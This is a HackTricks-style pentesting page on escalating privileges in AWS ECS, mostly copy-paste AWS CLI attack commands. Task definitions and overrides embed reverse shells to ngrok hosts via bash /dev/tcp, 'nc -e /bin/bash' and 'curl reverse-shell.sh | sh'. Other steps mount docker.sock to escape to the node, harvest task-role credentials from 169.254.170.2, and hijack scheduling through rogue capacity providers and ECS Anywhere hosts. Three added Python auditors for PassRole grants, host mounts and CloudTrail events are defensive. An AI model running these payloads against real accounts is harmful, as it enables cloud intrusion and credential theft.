AWS - ECS Privesc

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

ECS

More information about ECS in:

AWS - ECS Enum

iam:PassRole, ecs:RegisterTaskDefinition, ecs:RunTask

An attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:RunTask permissions in ECS can generate a new task definition with a malicious container that steals the metadata credentials and run it.

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512 \
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

# Run task definition
aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Potential impact: Direct privesc to a different ECS role.

iam:PassRole,ecs:RunTask

An attacker with the iam:PassRole and ecs:RunTask permissions can launch a new ECS task with a modified execution role, task role and container command. The ecs run-task CLI command has an --overrides flag that allows changing the executionRoleArn, taskRoleArn and container command at runtime without touching the task definition.

The IAM roles given as taskRoleArn and executionRoleArn must allow ecs-tasks.amazonaws.com to assume them in their trust policy.

In addition, the attacker needs to know:

  • ECS cluster name
  • VPC subnet
  • Security group (if no security group is specified, the default one is used)
  • Task definition name and revision
  • Name of the container

aws ecs run-task \
--cluster <cluster-name> \
--launch-type FARGATE \
--network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" \
--task-definition <task-definition:revision> \
--overrides '
{
"taskRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"containerOverrides": [
{
"name": "<container-name>",
"command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]
}
]
}'

In the snippet above the attacker only changes the taskRoleArn value. However, for the attack to work the attacker must have the iam:PassRole permission over the taskRoleArn given in the command and over the executionRoleArn set in the task definition.

If the IAM role the attacker can pass has enough privileges to pull the ECR image and start the ECS task (ecr:BatchCheckLayerAvailability, ecr:GetDownloadUrlForLayer, ecr:BatchGetImage, ecr:GetAuthorizationToken), the attacker can specify that same IAM role for both executionRoleArn and taskRoleArn in the ecs run-task command.

aws ecs run-task --cluster <cluster-name> --launch-type FARGATE --network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" --task-definition <task-definition:revision> --overrides '
{
"taskRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"executionRoleArn":"arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"containerOverrides": [
{
"name": "<container-name>",
"command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]
}
]
}'

Potential impact: Direct privesc to any ECS task role.
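Every path above hinges on iam:PassRole. As an added defender's example (not code from the page), the audit below reads IAM policy documents and reports PassRole grants that are not pinned to specific task roles and to ecs-tasks.amazonaws.com through the iam:PassedToService condition key. The two policy documents and the account id in them are constructed samples.

```python
"""Audit IAM policy documents for over-broad iam:PassRole grants.

A least-privilege grant names the roles it may pass and pins the receiving
service with the iam:PassedToService condition key, so the permission cannot
hand an arbitrary role to an ECS task.
"""
import fnmatch
import json

# Constructed sample: the kind of grant the run-task abuse above relies on.
BROAD_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": ["iam:PassRole", "ecs:RunTask", "ecs:RegisterTaskDefinition"],
        "Resource": "*",
    }],
})

# Constructed sample: PassRole limited to one task role and to ECS tasks.
SCOPED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["ecs:RunTask"], "Resource": "*"},
        {
            "Effect": "Allow",
            "Action": "iam:PassRole",
            "Resource": "arn:aws:iam::123456789012:role/app-task-role",
            "Condition": {"StringEquals": {"iam:PassedToService": "ecs-tasks.amazonaws.com"}},
        },
    ],
})


def _as_list(value):
    """IAM accepts a string or a list in most fields; normalise to a list."""
    return value if isinstance(value, list) else [value]


def _grants_passrole(stmt):
    """True if an Allow statement's Action patterns (e.g. iam:*) cover iam:PassRole."""
    if stmt.get("Effect") != "Allow":
        return False
    return any(fnmatch.fnmatch("iam:passrole", a.lower())
               for a in _as_list(stmt.get("Action", [])))


def _passed_to_service(stmt):
    """Return the iam:PassedToService values, or None if the key is absent."""
    for block in stmt.get("Condition", {}).values():   # e.g. {"StringEquals": {...}}
        for key, val in block.items():
            if key.lower() == "iam:passedtoservice":
                return [v.lower() for v in _as_list(val)]
    return None


def audit_passrole(policy_json):
    """Return (statement index, issue) pairs for PassRole grants that are too broad."""
    findings = []
    for idx, stmt in enumerate(_as_list(json.loads(policy_json).get("Statement", []))):
        if not _grants_passrole(stmt):
            continue
        resources = _as_list(stmt.get("Resource", []))
        if any(r == "*" or r.endswith(":role/*") for r in resources):
            findings.append((idx, "PassRole on a wildcard role resource"))
        services = _passed_to_service(stmt)
        if services is None:
            findings.append((idx, "PassRole without an iam:PassedToService condition"))
        elif "*" in services:
            findings.append((idx, "iam:PassedToService allows any service"))
    return findings
```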

iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask

Just like in the previous example, an attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:StartTask permissions in ECS can generate a new task definition with a malicious container that steals the metadata credentials and run it.
However, in this case a container instance is needed to run the malicious task definition.

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512 \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

aws ecs start-task --task-definition iam_exfiltration \
--container-instances <instance_id>

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Potential impact: Direct privesc to any ECS role.

iam:PassRole, ecs:RegisterTaskDefinition, (ecs:UpdateService|ecs:CreateService)

Just like in the previous example, an attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:UpdateService or ecs:CreateService permissions in ECS can generate a new task definition with a malicious container that steals the metadata credentials and run it by creating a new service with at least one running task.

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn  "$ECS_ROLE_ARN" \
--network-mode "awsvpc" \
--cpu 256 --memory 512 \
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"

# Run the task creating a service
aws ecs create-service --service-name exfiltration \
--task-definition iam_exfiltration \
--desired-count 1 \
--cluster "$CLUSTER_ARN" \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"

# Run the task updating a service
aws ecs update-service --cluster <CLUSTER NAME> \
--service <SERVICE NAME> \
--task-definition <NEW TASK DEFINITION NAME>

Potential impact: Direct privesc to any ECS role.

iam:PassRole, (ecs:UpdateService|ecs:CreateService)

Actually, with just those permissions it is possible to use overrides to execute arbitrary commands in a container with an arbitrary role, using something like:

aws ecs run-task \
--task-definition "<task-name>" \
--overrides '{"taskRoleArn":"<role-arn>", "containerOverrides":[{"name":"<container-name-in-task>","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \
--cluster <cluster-name> \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"<subnet-name>\"]}}"

Potential impact: Direct privesc to any ECS role.

ecs:RegisterTaskDefinition, (ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)

This scenario is like the previous ones but without the iam:PassRole permission.
It is still interesting because, if you can run an arbitrary container even without a role, you could run a privileged container to escape to the node and steal the EC2 IAM role and the roles of the other ECS containers running on that node.
You could even force other tasks to run inside the EC2 instance you compromise in order to steal their credentials (as explained in the Privesc to node section).

Warning

This attack is only possible if the ECS cluster is using EC2 instances and not Fargate.

printf '[
{
"name":"exfil_creds",
"image":"python:latest",
"entryPoint":["sh", "-c"],
"command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
"mountPoints": [
{
"readOnly": false,
"containerPath": "/var/run/docker.sock",
"sourceVolume": "docker-socket"
}
]
}
]' > /tmp/task.json

printf '[
{
"name": "docker-socket",
"host": {
"sourcePath": "/var/run/docker.sock"
}
}
]' > /tmp/volumes.json


aws ecs register-task-definition --family iam_exfiltration \
--cpu 256 --memory 512 \
--requires-compatibilities '["EC2"]' \
--container-definitions file:///tmp/task.json \
--volumes file:///tmp/volumes.json


aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
--launch-type EC2

# You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell
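The node escape above works because the task definition bind-mounts the host's /var/run/docker.sock. As an added defender's example (not code from the page), the check below walks a task definition in the JSON shape register-task-definition accepts, resolves each mountPoint to its host volume, and reports host bind mounts of sensitive paths, privileged containers and host PID/network modes. Both task definitions are constructed samples.

```python
"""Report ECS task definitions whose containers can reach the host node."""
import json

# Host paths that give a container control of the node or of its other tasks.
SENSITIVE_HOST_PATHS = ("/", "/var/run/docker.sock", "/run/docker.sock",
                        "/var/lib/docker", "/etc", "/root", "/proc", "/sys")

# Constructed sample mirroring the docker-socket task definition above.
ESCAPE_TASK = json.dumps({
    "family": "iam_exfiltration",
    "requiresCompatibilities": ["EC2"],
    "volumes": [{"name": "docker-socket", "host": {"sourcePath": "/var/run/docker.sock"}}],
    "containerDefinitions": [{
        "name": "exfil_creds", "image": "python:latest",
        "mountPoints": [{"sourceVolume": "docker-socket",
                         "containerPath": "/var/run/docker.sock", "readOnly": False}],
    }],
})

# Constructed sample of an ordinary web task whose only volume is ECS-managed.
WEB_TASK = json.dumps({
    "family": "web",
    "volumes": [{"name": "cache"}],   # no host.sourcePath: not a host bind mount
    "containerDefinitions": [{"name": "web", "image": "nginx:latest",
                              "mountPoints": [{"sourceVolume": "cache", "containerPath": "/cache"}]}],
})


def _is_sensitive(path):
    """True if path is, contains, or lies inside one of SENSITIVE_HOST_PATHS."""
    norm = path.rstrip("/") or "/"
    for p in SENSITIVE_HOST_PATHS:
        if norm == p or norm.startswith(p + "/") or p.startswith(norm + "/"):
            return True
    return False


def audit_task_definition(task_def_json):
    """Return (scope, issue) pairs; scope is 'task' or a container name."""
    td = json.loads(task_def_json)
    findings = []
    for mode in ("networkMode", "pidMode", "ipcMode"):
        if td.get(mode) == "host":
            findings.append(("task", f"{mode}=host shares the node's namespace"))
    # Only volumes with host.sourcePath are bind mounts from the node.
    host_volumes = {v["name"]: v["host"]["sourcePath"]
                    for v in td.get("volumes", []) if "sourcePath" in (v.get("host") or {})}
    for c in td.get("containerDefinitions", []):
        name = c.get("name", "?")
        if c.get("privileged"):
            findings.append((name, "privileged container"))
        caps = ((c.get("linuxParameters") or {}).get("capabilities") or {}).get("add") or []
        if "SYS_ADMIN" in caps:
            findings.append((name, "adds CAP_SYS_ADMIN"))
        for mp in c.get("mountPoints", []):
            src = host_volumes.get(mp.get("sourceVolume"))
            if src is not None and _is_sensitive(src):
                mode = "ro" if mp.get("readOnly") else "rw"
                findings.append((name, f"host path {src} mounted {mode} at {mp.get('containerPath')}"))
    return findings
```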

ecs:ExecuteCommand, ecs:DescribeTasks,(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)

An attacker with ecs:ExecuteCommand and ecs:DescribeTasks can execute commands inside a running container and exfiltrate the IAM role attached to that container (the describe permissions are needed because aws ecs execute-command requires them).
However, for this to work the container instance must be running the ExecuteCommand agent (which is not running by default).

Therefore, the attacker can try to:

  • Try to run a command in every running container

# List enableExecuteCommand on each task
for cluster in $(aws ecs list-clusters | jq .clusterArns | grep '"' | cut -d '"' -f2); do
echo "Cluster $cluster"
for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do
echo "  Task $task"
# If true, it's your lucky day
aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand
done
done

# Execute a shell in a container
aws ecs execute-command --interactive \
--command "sh" \
--cluster "$CLUSTER_ARN" \
--task "$TASK_ARN"
  • If he has ecs:RunTask, run a task with aws ecs run-task --enable-execute-command [...]
  • If he has ecs:StartTask, run a task with aws ecs start-task --enable-execute-command [...]
  • If he has ecs:CreateService, create a service with aws ecs create-service --enable-execute-command [...]
  • If he has ecs:UpdateService, update a service with aws ecs update-service --enable-execute-command [...]

You can find examples of those options in the previous ECS privesc sections.

Potential impact: Privesc to a different role attached to the containers.

ssm:StartSession

Check in the ssm privesc page how you can abuse this permission to privesc to ECS:

AWS - SSM Privesc

iam:PassRole, ec2:RunInstances

Check in the ec2 privesc page how you can abuse these permissions to privesc to ECS:

AWS - EC2 Privesc

ecs:RegisterContainerInstance, ecs:DeregisterContainerInstance, ecs:StartTask, iam:PassRole

An attacker with these permissions could potentially register an EC2 instance into the ECS cluster and run tasks on it. This would allow the attacker to execute arbitrary code in the context of the ECS tasks.

  • TODO: Is it possible to register an instance from a different AWS account so that tasks run on machines controlled by the attacker??

ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, ecs:DescribeTaskSets

Note

TODO: Test this

An attacker with the ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet and ecs:DescribeTaskSets permissions can create a malicious task set for an existing ECS service and update the primary task set. This allows the attacker to execute arbitrary code within the service.

# Register a task definition with a reverse shell
echo '{
"family": "malicious-task",
"containerDefinitions": [
{
"name": "malicious-container",
"image": "alpine",
"command": [
"sh",
"-c",
"apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
]
}
]
}' > malicious-task-definition.json

aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json

# Create a malicious task set for the existing service
aws ecs create-task-set --cluster existing-cluster --service existing-service --task-definition malicious-task --network-configuration "awsvpcConfiguration={subnets=[subnet-0e2b3f6c],securityGroups=[sg-0f9a6a76],assignPublicIp=ENABLED}"

# Update the primary task set for the service
aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id

Potential impact: Arbitrary code execution in the affected service, which can affect its functionality or lead to exfiltration of sensitive data.

Hijack ECS scheduling via a malicious Capacity Provider (EC2 ASG takeover)

An attacker with permissions to manage ECS capacity providers and update services can create an EC2 Auto Scaling Group they control, wrap it in an ECS Capacity Provider, associate it with the target cluster and migrate the victim service to that provider. Tasks will then be scheduled onto the attacker-controlled EC2 instances, giving OS-level access to inspect the containers and steal the task role credentials.

Commands (us-east-1):

  • Prerequisites
  • Create a Launch Template for the ECS agent to join the target cluster
  • Create an Auto Scaling Group
  • Create a Capacity Provider from the ASG
  • Associate the Capacity Provider with the cluster (optionally as the default)
  • Migrate the service to your provider
  • Verify that tasks land on the attacker-controlled instances
  • Optional: from the EC2 node, docker exec into the target containers and read http://169.254.170.2 to obtain the task role credentials.
  • Cleanup

Potential impact: Attacker-controlled EC2 nodes receive the victim's tasks, giving OS-level access to the containers and theft of the task IAM role credentials.

Step-by-step commands (copy/paste)

export AWS_DEFAULT_REGION=us-east-1
CLUSTER=arn:aws:ecs:us-east-1:947247140022:cluster/ht-victim-cluster

# Instance profile for ECS nodes
aws iam create-role --role-name ht-ecs-instance-role --assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ec2.amazonaws.com"},"Action":"sts:AssumeRole"}]}' || true
aws iam attach-role-policy --role-name ht-ecs-instance-role --policy-arn arn:aws:iam::aws:policy/service-role/AmazonEC2ContainerServiceforEC2Role || true
aws iam create-instance-profile --instance-profile-name ht-ecs-instance-profile || true
aws iam add-role-to-instance-profile --instance-profile-name ht-ecs-instance-profile --role-name ht-ecs-instance-role || true

# Networking, AMI and user-data for the launch template and ASG (fill in the empty values)
VPC=vpc-18e6ac62
SUBNETS=
AMI=ami-0b570770164588ab4
USERDATA=IyEvYmluL2Jhc2gKZWNobyBFQ1NfQ0xVU1RFUj0gPj4gL2V0Yy9lY3MvZWNzLmNvbmZpZwo=
LT_ID=
ASG_ARN=

# Capacity provider from the ASG, attached to the cluster as the default
CP_NAME=htcp-8797
aws ecs create-capacity-provider --name "$CP_NAME" --auto-scaling-group-provider "autoScalingGroupArn=$ASG_ARN,managedScaling={status=ENABLED,targetCapacity=100},managedTerminationProtection=DISABLED"
aws ecs put-cluster-capacity-providers --cluster "$CLUSTER" --capacity-providers "$CP_NAME" --default-capacity-provider-strategy capacityProvider=$CP_NAME,weight=1

# Migrate the service (its task definition must be EC2-compatible, not Fargate-only)
SVC=
aws ecs update-service --cluster "$CLUSTER" --service "$SVC" --capacity-provider-strategy capacityProvider=$CP_NAME,weight=1 --force-new-deployment

# Check which EC2 instance a task landed on
TASK=
CI=
aws ecs describe-container-instances --cluster "$CLUSTER" --container-instances "$CI" --query containerInstances[0].ec2InstanceId --output text

Backdoor compute in-cluster via ECS Anywhere EXTERNAL registration

Use ECS Anywhere to register an attacker-controlled host as an EXTERNAL container instance in the target ECS cluster and run tasks on that host using privileged task and execution roles. This gives OS-level control over where the tasks run (your own machine) and lets you steal credentials/data from the tasks and attached volumes without touching capacity providers or ASGs.

  • Required permissions (minimal example):
    • ecs:CreateCluster (optional), ecs:RegisterTaskDefinition, ecs:StartTask or ecs:RunTask
    • ssm:CreateActivation, ssm:DeregisterManagedInstance, ssm:DeleteActivation
    • iam:CreateRole, iam:AttachRolePolicy, iam:DeleteRole, iam:PassRole (for the ECS Anywhere instance role and the task/execution roles)
    • logs:CreateLogGroup/Stream, logs:PutLogEvents (if using awslogs)
  • Impact: Run arbitrary containers with a chosen taskRoleArn on the attacker host; exfiltrate task-role credentials from 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI; access any volumes mounted by tasks; stealthier than manipulating capacity providers/ASGs.

Steps

  1. Create/identify the cluster (us-east-1)

aws ecs create-cluster --cluster-name ht-ecs-anywhere

  2. Create the ECS Anywhere role and an SSM activation (for the on-prem/EXTERNAL instance)

aws iam create-role --role-name ecsAnywhereRole \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ssm.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name ecsAnywhereRole --policy-arn arn:aws:iam::aws:policy/AmazonSSMManagedInstanceCore
aws iam attach-role-policy --role-name ecsAnywhereRole --policy-arn arn:aws:iam::aws:policy/service-role/AmazonEC2ContainerServiceforEC2Role
ACTJSON=$(aws ssm create-activation --iam-role ecsAnywhereRole)
ACT_ID=$(echo $ACTJSON | jq -r .ActivationId); ACT_CODE=$(echo $ACTJSON | jq -r .ActivationCode)

  3. Set up the attacker host and have it auto-register as EXTERNAL (for example: a small AL2 EC2 instance acting as "on-prem")

user-data.sh:

#!/bin/bash
set -euxo pipefail
amazon-linux-extras enable docker || true
yum install -y docker curl jq
systemctl enable --now docker
curl -fsSL -o /root/ecs-anywhere-install.sh "https://amazon-ecs-agent.s3.amazonaws.com/ecs-anywhere-install-latest.sh"
chmod +x /root/ecs-anywhere-install.sh
/root/ecs-anywhere-install.sh --cluster ht-ecs-anywhere --activation-id ${ACT_ID} --activation-code ${ACT_CODE} --region us-east-1

Launch the host:

AMI=$(aws ssm get-parameters --names /aws/service/ami-amazon-linux-latest/amzn2-ami-hvm-x86_64-gp2 --query 'Parameters[0].Value' --output text)
IID=$(aws ec2 run-instances --image-id $AMI --instance-type t3.micro \
--user-data file://user-data.sh --query 'Instances[0].InstanceId' --output text)
aws ec2 wait instance-status-ok --instance-ids $IID

  4. Verify that the EXTERNAL container instance has joined

aws ecs list-container-instances --cluster ht-ecs-anywhere
aws ecs describe-container-instances --cluster ht-ecs-anywhere \
--container-instances --query 'containerInstances[0].[ec2InstanceId,attributes]'
# ec2InstanceId will be mi-XXXXXXXX (SSM managed instance id) and attributes include ecs.capability.external

  5. Create the task/execution roles, register an EXTERNAL task definition, and run it on the attacker host

# roles
aws iam create-role --role-name ht-ecs-task-exec \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ecs-tasks.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name ht-ecs-task-exec --policy-arn arn:aws:iam::aws:policy/service-role/AmazonECSTaskExecutionRolePolicy
aws iam create-role --role-name ht-ecs-task-role \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ecs-tasks.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
# attach any privileges you want to abuse to this task role

# task def (EXTERNAL launch)
cat > td-external.json << 'JSON'
{
"family": "ht-external",
"requiresCompatibilities": ["EXTERNAL"],
"networkMode": "bridge",
"memory": "256",
"cpu": "128",
"executionRoleArn": "arn:aws:iam:::role/ht-ecs-task-exec",
"taskRoleArn": "arn:aws:iam:::role/ht-ecs-task-role",
"containerDefinitions": [
{"name":"steal","image":"public.ecr.aws/amazonlinux/amazonlinux:latest",
"entryPoint":["/bin/sh","-c"],
"command":["REL=$(printenv AWS_CONTAINER_CREDENTIALS_RELATIVE_URI); echo CREDS:; curl -s http://169.254.170.2$REL; sleep 600"],
"memory": 128,
"logConfiguration":{"logDriver":"awslogs","options":{"awslogs-region":"us-east-1","awslogs-group":"/ht/ecs/anywhere","awslogs-stream-prefix":"steal"}}
}
]
}
JSON
aws logs create-log-group --log-group-name /ht/ecs/anywhere || true
aws ecs register-task-definition --cli-input-json file://td-external.json
CI=$(aws ecs list-container-instances --cluster ht-ecs-anywhere --query 'containerInstanceArns[0]' --output text)
aws ecs start-task --cluster ht-ecs-anywhere --task-definition ht-external \
--container-instances $CI

  6. From there you control the host that runs the tasks. You can read the task logs (if awslogs) or exec directly on the host to exfiltrate credentials/data from your tasks.
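The ECS Exec, capacity-provider and ECS Anywhere techniques above, like the earlier run-task --overrides abuse, all send request parameters that are recorded in CloudTrail. As an added defender's example (not code from the page), the scanner below walks CloudTrail records and flags run-time role or command overrides, ECS Exec being enabled, EXTERNAL task definitions and SSM hybrid activations, and capacity-provider changes that move a service onto other nodes. The records are constructed samples holding only the fields the rules inspect.

```python
"""Flag CloudTrail records that match the ECS abuse patterns on this page."""

RUN_EVENTS = {"RunTask", "StartTask"}
EXEC_EVENTS = RUN_EVENTS | {"CreateService", "UpdateService"}
CAPACITY_EVENTS = {"CreateCapacityProvider", "PutClusterCapacityProviders"}


def _ecs_reasons(name, params):
    """Reasons a single ecs.amazonaws.com record is suspicious (may be empty)."""
    reasons = []
    if name in RUN_EVENTS:
        ov = params.get("overrides") or {}
        for key in ("taskRoleArn", "executionRoleArn"):   # --overrides role swap
            if ov.get(key):
                reasons.append(f"{key} overridden at launch: {ov[key]}")
        for c in ov.get("containerOverrides") or []:      # --overrides command swap
            if c.get("command"):
                reasons.append(f"command overridden for container {c.get('name')}")
    if name in EXEC_EVENTS and params.get("enableExecuteCommand"):
        reasons.append("ECS Exec enabled")                # --enable-execute-command
    if name == "RegisterTaskDefinition" and "EXTERNAL" in (params.get("requiresCompatibilities") or []):
        reasons.append("EXTERNAL task definition (ECS Anywhere host)")
    if name in CAPACITY_EVENTS:
        reasons.append("capacity provider created or attached to cluster")
    if name == "UpdateService" and params.get("capacityProviderStrategy"):
        reasons.append("service moved to another capacity provider")
    return reasons


def scan_cloudtrail(records):
    """Return (eventName, principal arn, reason) for every suspicious record."""
    hits = []
    for rec in records:
        name = rec.get("eventName", "")
        params = rec.get("requestParameters") or {}
        principal = (rec.get("userIdentity") or {}).get("arn", "?")
        if rec.get("eventSource") == "ecs.amazonaws.com":
            reasons = _ecs_reasons(name, params)
        elif rec.get("eventSource") == "ssm.amazonaws.com" and name == "CreateActivation":
            reasons = [f"SSM hybrid activation for role {params.get('iamRole')}"]
        else:
            reasons = []
        hits.extend((name, principal, r) for r in reasons)
    return hits


# Constructed sample records (only the fields the rules read).
DEV = {"arn": "arn:aws:iam::123456789012:user/dev"}
SAMPLE_RECORDS = [
    {"eventSource": "ecs.amazonaws.com", "eventName": "RunTask", "userIdentity": DEV,
     "requestParameters": {"cluster": "API", "taskDefinition": "web:3", "overrides": {
         "taskRoleArn": "arn:aws:iam::123456789012:role/HighPrivilegedECSTaskRole",
         "containerOverrides": [{"name": "web", "command": ["sh", "-c", "id"]}]}}},
    {"eventSource": "ecs.amazonaws.com", "eventName": "UpdateService", "userIdentity": DEV,
     "requestParameters": {"cluster": "API", "service": "web", "enableExecuteCommand": True}},
    {"eventSource": "ssm.amazonaws.com", "eventName": "CreateActivation", "userIdentity": DEV,
     "requestParameters": {"iamRole": "ecsAnywhereRole"}},
    {"eventSource": "ecs.amazonaws.com", "eventName": "RunTask",       # ordinary launch
     "userIdentity": {"arn": "arn:aws:iam::123456789012:role/deploy"},
     "requestParameters": {"cluster": "API", "taskDefinition": "web:3"}},
]

if __name__ == "__main__":
    for hit in scan_cloudtrail(SAMPLE_RECORDS):
        print(*hit, sep=" | ")
```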


